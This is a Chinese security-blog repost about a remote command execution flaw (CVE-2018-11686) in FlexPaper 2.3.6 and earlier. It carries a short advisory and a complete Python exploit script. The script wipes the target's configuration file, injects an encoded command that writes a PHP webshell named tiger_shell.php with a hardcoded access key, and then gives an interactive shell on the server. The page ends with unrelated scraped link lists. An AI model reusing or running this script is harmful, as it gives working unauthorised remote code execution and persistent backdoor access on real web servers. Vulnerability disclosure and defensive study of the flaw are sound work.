FlexPaper 2.3.6 远程命令执行漏洞 附Exp

时间:2022-09-16 09:38:38

影响版本:小于FlexPaper 2.3.6的所有版本

FlexPaper (https://www.flowpaper.com)

  是一个开源项目,遵循GPL协议,在互联网上非常流行。它为web客户端、移动设备和平板设备提供文档的查看功能。至少在2014年之前,维基解密一直在广泛的使用该组件,漏洞产生的原因是受到一个XSS漏洞补丁的影响。

  Red Timmy Sec在FlexPaper上发现了一个远程命令执行漏洞。供应商立即联系并注册了CVE 2018-11686。尽管这个项目的2.3.7版本已经发布了一个补丁,但是这个漏洞本身直到现在仍然没有被公开。

  关于这个漏洞的详细情况请看:https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

  文末附Exp.

----------------

FlexPaper <=2.3.6 Remote Command Execution

FlexPaper (https://www.flowpaper.com) is an open source project, released under GPL license, quite widespread over the internet. It provides document viewing functionalities to web clients, mobile and tablet devices. At least until 2014 the component has been actively used by WikiLeaks, when it was discovered to be affected by a XSS vulnerability subsequently patched.

Around one year ago Red Timmy Sec discovered a Remote Command Execution vulnerability on FlexPaper. The vendor was immediately contacted and a CVE registered (2018-11686). However the vulnerability itself has remained undisclosed until now, regardless the fact that a patch has been issued with the release 2.3.7 of the project.

Full analysis of this vulnerability can be found here: https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

----------------

Exp(Exploit):

 #!/usr/bin/env python

 #Exploit Title: FlexPaper PHP Publish Service <= 2.3.6 RCE

 #Date: March 2019

 #Exploit Author: Red Timmy Security - redtimmysec.wordpress.com

 #Vendor Homepage: https://flowpaper.com/download/

 #Version: <= 2.3.6

 #Tested on: Linux/Unix

 #CVE : CVE-2018-11686

 #Disclamer: This exploit is for educational purpose only

 #More details on https://redtimmysec.wordpress.com/2019/03/07/flexpaper-remote-code-execution/

 import sys

 import requests

 import readline

 import urllib2

 import ssl

 try:

         url = sys.argv[1]

 except:

         print "[-] usage $python shredpaper.py http://targert.com/flexpaper/"

         print sys.exit(1)

 print """

          __                  __

    _____/ /_  ________  ____/ ____  ____ _____  ___  _____

   / ___/ __ \/ ___/ _ \/ __  / __ \/ __ `/ __ \/ _ \/ ___/

  (__  / / / / /  /  __/ /_/ / /_/ / /_/ / /_/ /  __/ /

 /____/_/ /_/_/   \___/\__,_/ .___/\__,_/ .___/\___/_/

                           /_/         /_/

 """

 print "[*] FlexPaper <= 2.3.6 Remote Command Execution - Red Timmy Security)"

 print "[*] Attacking %s" %url

 print "[*] Deleting target configuration file"

 payload = (("SAVE_CONFIG",""),("PDF_Directory","/var/www/html/flex2.3.6/flexpaper/pdf"),("SWF_Directory","config/"),("LICENSEKEY",""),("splitmode",""),("RenderingOrder_PRIM","flash"),("RenderingOrder_SEC","html"))

 url1 = url+"/php/change_config.php"

 r1 = requests.post(url1, data=payload)

 rx = requests.post(url1, data=payload) #resend

 shellcode = "%69%64%3b%65%63%68%6f%20%50%44%39%77%61%48%41%4b%43%69%52%72%5a%58%6b%67%50%53%41%6b%58%30%64%46%56%46%73%6e%59%57%4e%6a%5a%58%4e%7a%4a%31%30%37%43%67%70%70%5a%69%67%6b%61%32%56%35%50%54%30%6e%4d%44%6b%34%4e%7a%63%7a%4e%7a%59%78%4d%54%59%30%4e%7a%49%33%4e%44%49%33%4f%44%51%7a%4d%6a%51%34%4d%6a%52%74%65%47%31%74%65%47%30%6e%4b%58%73%4b%43%67%6c%6c%59%32%68%76%49%48%4e%6f%5a%57%78%73%58%32%56%34%5a%57%4d%6f%59%6d%46%7a%5a%54%59%30%58%32%52%6c%59%32%39%6b%5a%53%67%6b%58%30%64%46%56%46%73%6e%59%32%31%6b%4a%31%30%70%4b%54%73%4b%43%6e%30%37%43%6a%38%2b%43%67%3d%3d%7c%62%61%73%65%36%34%20%2d%64%20%3e%24%28%70%77%64%29%2f%74%69%67%65%72%5f%73%68%65%6c%6c%2e%70%68%70%3b%69%64"

 print "[*] Uploading webshell.."

 url2 = url+"/php/setup.php?step=2&PDF2SWF_PATH="+shellcode

 r2 = requests.get(url2)

 print "[*] Checking if shell is uploaded successfully"

 webshell = url+ '/php/tiger_shell.php'

 check_shell = requests.get(webshell)

 if check_shell.status_code == 200:

         print "[*] We got a shell"

 else:

         print "[-] Exploit failed, die"

         sys.exit(2)

 ctx = ssl.create_default_context()

 ctx.check_hostname = False

 ctx.verify_mode = ssl.CERT_NONE

 while True:

         cmd = raw_input("enter cmd>>")

         cmd = cmd.strip()

         cmd = cmd.encode('base64').strip().replace("\n","")

         link = url+"/php/tiger_shell.php?cmd=%s&access=09877376116472742784324824mxmmxm" %cmd.strip()

         #print link

         try:

                 response = urllib2.urlopen(link, context=ctx)

                 page = response.read()

                 print page

         except Exception as exc:

                 print exc

                 continue

FlexPaper 2.3.6 远程命令执行漏洞 附Exp的更多相关文章

  1. struts2远程命令执行漏洞S2-045

    Apache Struts2最新漏洞(CVE-2017-5638,S02-45) struts2远程命令执行漏洞S2-045 Apache Struts 2被曝存在远程命令执行漏洞,漏洞编号S2-04 ...

  2. 【漏洞公告】高危&colon;Windows系统 SMB&sol;RDP远程命令执行漏洞

    2017年4月14日,国外黑客组织Shadow Brokers发出了NSA方程式组织的机密文档,包含了多个Windows 远程漏洞利用工具,该工具包可以可以覆盖全球70%的Windows服务器,为了确 ...

  3. Apache Tomcat远程命令执行漏洞&lpar;CVE-2017-12615&rpar; 漏洞利用到入侵检测

    本文作者:i春秋作家——Anythin9 1.漏洞简介 当 Tomcat运行在Windows操作系统时,且启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 fals ...

  4. Drupal 远程命令执行漏洞(CVE-2018-7600)

    名称: Drupal 远程命令执行漏洞 CVE-ID: CVE-2018-7600 Poc: https://paper.seebug.org/578/ EXPLOIT-DB: https://www ...

  5. D-Link service&period;cgi远程命令执行漏洞复现

    1.1 概述 友讯集团(D-Link),成立于1986年,1994年10月于*证券交易所挂牌上市,为*第一家上市的网络公司,以自创D-Link品牌行销全球,产品遍及100多个国家. 1月17日,C ...

  6. Apache SSI 远程命令执行漏洞复现

    Apache SSI 远程命令执行漏洞复现 一.漏洞描述 当目标服务器开启了SSI与CGI支持,我们就可以上传shtml,利用<!--#exec cmd=”id” -->语法执行命令. 使 ...

  7. ThinkPHP 5&period;x远程命令执行漏洞复现

    ThinkPHP 5.x远程命令执行漏洞复现 一.漏洞描述 2018年12月10日,ThinkPHP官方发布了安全更新,其中修复了ThinkPHP5框架的一个高危漏洞: https://blog.th ...

  8. Weblogic wls9&lowbar;async&lowbar;response 反序列化远程命令执行漏洞(CVE-2019-2725)复现

    一.     漏洞简介 漏洞编号和级别 CVE编号:CVE-2019-2725,危险级别:高危,CVSS分值:9.8. CNVD 编号:CNVD-C-2019-48814,CNVD对该漏洞的综合评级为 ...

  9. ThinkPHP 5&period;0&period;x、5&period;1&period;x、5&period;2&period;x 全版本远程命令执行漏洞

    ThinkPHP 5.0.x.5.1.x.5.2.x 全版本远程代码执行漏洞 作者:SoulCat. 来源:CSDN 原文:https://blog.csdn.net/csacs/article/de ...

随机推荐

  1. C&plus;&plus; dynamic&lowbar;cast对指针类型的转换

    C8-3 三角形还是长方形? (100.0/100 points) 题目描述 在多态概念中,基类的指针既可以指向基类的对象,又可以指向派生类的对象.我们可以使用dynamic_cast类型转换操作符来 ...

  2. &lpar;转&rpar;JS产生随机数的几个用法!

    原文 1 <script> 2 function GetRandomNum(Min,Max) 3 { 4 var Range = Max - Min; 5 var Rand = Math. ...

  3. rabbitmq 重复ACK导致消息丢失

    rabbitmq 重复确认导致消息丢失 背景 rabbitmq 在应用场景中,大多采用工作队列 work-queue的模式. 在一个常见的工作队列模式中,消费者 worker 将不断的轮询从队列中拉取 ...

  4. GJM:用C&num;实现网络爬虫(一) &lbrack;转载&rsqb;

    网络爬虫在信息检索与处理中有很大的作用,是收集网络信息的重要工具. 接下来就介绍一下爬虫的简单实现. 爬虫的工作流程如下 爬虫自指定的URL地址开始下载网络资源,直到该地址和所有子地址的指定资源都下载 ...

  5. 深入理解ThreadLocal(转)&lpar;2015年06月11日)

    注明:转自:http://my.oschina.net/clopopo/blog/149368 学习一个东西首先要知道为什么要引入它,就是我们能用它来干什么.所以我们先来看看ThreadLocal对我 ...

  6. js子窗口修改父窗口内容

    在框架中,我用 JavaScript 获取 JSON 数据,组织成 HTML 代码,最后将其填充至上层文档的一个元素中.按照一般的写法,我们需要用到类似如下的语句: 1.window.parent.d ...

  7. flex 调用WebService2&lpar;基于&period;net&rpar;

    flex 访问WebService的方法有很多种,使用FLEX4中的"数据/服务"功能可以自动生成访问WebService的代理类,这样可以避免把所有的数据访问都写到MXML页面上 ...

  8. Java基础知识拾遗&lpar;一&rpar;

    Java Threads 1. 创建线程的三种方法? 继承Thread类: 实现Runnable接口: 使用Executor框架创建一个线程池. 每个线程都有优先级(Thread.MAX_PRIORI ...

  9. OSTC 2015

    上周六去北京参加了OSTC 2015开源技术大会,并分享了<Spark技术内幕>,主要涵盖了Spark Core的核心实现.我主要以WordCount为例,讲解了任务调度的具体实现,资源分 ...

  10. C&num;导出Excel表格方法

    using NPOI.SS.UserModel; using NPOI.XSSF.UserModel; using NPOI.SS.Formula.Functions; using System.Re ...

相关文章